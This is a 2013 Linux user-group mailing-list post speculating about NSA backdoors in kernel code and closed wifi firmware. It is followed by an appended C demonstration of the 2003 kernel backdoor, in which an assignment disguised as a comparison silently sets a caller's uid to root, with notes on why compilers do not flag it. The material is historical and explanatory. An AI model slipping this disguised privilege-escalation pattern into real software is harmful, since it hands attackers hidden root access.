[SATLUG] NSA/IP stack in non-free wifi drivers?

Joe null.div.zero at gmail.com
Tue Aug 13 22:28:37 CDT 2013


Hi All,
     So, I may be cracking up here; but, I'm curious to see your responses
to this.  I've been reading the Snowden stuff in the news. Apparently
there's some renewed discussion out there about proprietary software
containing handy back doors for the NSA to snoop on people.  A coworker
suggested there would be a surge of Linux adopters in the wake of those
suggestions.  But, then I started to research the Linux code, and found:
The Linux source code is around 15 million lines of code
http://en.wikipedia.org/wiki/Linux_kernel#History
Searching for "malicious code in Linux source" yields a breach in 2011 and
this from 2003:
https://freedom-to-tinker.com/blog/felten/linux-backdoor-attempt-thwarted/
which included this malicious line:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
Notice the `=` used instead of `==`.
That error was caught.  And, I'm quite certain the Linux maintainers keep a
close eye on the source code.  So, where else can you get nefarious code
into the running Linux kernel?  Ken Thompson suggested one could modify the
source code of a compiler in such a way that the resulting modified
compiler would insert a secret "universal" password into any code that
called the Linux logon library:  http://cm.bell-labs.com/who/ken/trust.html.
Some commentators on this issue suggest that compiling the compiler code twice
(each time by the newest compiler; sort of like recursion) then doing a hash
check successfully proves safety.  I'm not sure I agree; seems like a
simple if statement would prevent the re-insertion of the code in question.
A scary thought; but, still my feeling is that malicious code would
ultimately get lost by attrition.  And, even if it weren't, file encryption,
firewalls, and network monitoring software would stop or expose the issue.
Then tonight I went and installed Debian on an old Dell.  I was prompted that
a non-free firmware was required for my wireless device. ...  Come to think
of it, 9 out of 10 laptops require some non-free/closed source code for their
wireless hardware.  Is it a coincidence that the most used network device
on the most popular end user systems is only usable via closed source
code?  Furthermore, the compiled size of the TCP/IP stack can be as little
as 512kb; my firmware tonight was 14MB!  Is it possible that backdoors are
hiding in plain sight, with 99% of end users willingly (and sometimes
painstakingly) building that backdoor into their own kernels?  And, if,
indeed, a nonstandard networking stack were used on top of the existing
datalink layer, whether in series or parallel, it would likely go unnoticed.
So, what do you think?  Am I losing it?
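The `=` versus `==` line quoted in the post, reduced to a stand-alone C program so the side effect can be observed next to the intended comparison. This is an added example, not code from the post or from the kernel; `struct task`, the macro values and the two wrapper functions are constructed stand-ins for the real kernel definitions.

```c
#include <stdio.h>

/* Constructed stand-ins for the kernel names used in the quoted line;
 * the values are illustrative, not copied from kernel headers. */
#ifndef __WCLONE
#define __WCLONE 0x80000000u
#endif
#ifndef __WALL
#define __WALL   0x40000000u
#endif
#ifndef EINVAL
#define EINVAL   22
#endif

struct task { unsigned int uid; };   /* uid 0 is root */

/* The 2003 line as submitted: `=` ASSIGNS 0 to uid and evaluates to 0,
 * so the condition is always false and retval is never set, but the
 * caller's uid has silently become 0 (root).  The extra parentheses
 * around the assignment keep gcc's -Wparentheses quiet, so the compiler
 * does not flag it; it was caught by people inspecting the change. */
int wait_check_backdoored(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* The intended line: `==` compares and has no side effect. */
int wait_check_correct(const struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

int main(void)
{
    struct task t = { 1000 };   /* constructed: an unprivileged caller */
    struct task u = { 1000 };
    int rv = wait_check_backdoored(&t, __WCLONE | __WALL);
    printf("backdoored: retval=%d, uid after call=%u\n", rv, t.uid);
    rv = wait_check_correct(&u, __WCLONE | __WALL);
    printf("correct:    retval=%d, uid after call=%u\n", rv, u.uid);
    return 0;
}
```

Compile with `-Wall` and note that neither function produces a warning; the parenthesized assignment is exactly the form compilers treat as intentional, which is why review of the change history, not the build, surfaced it.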

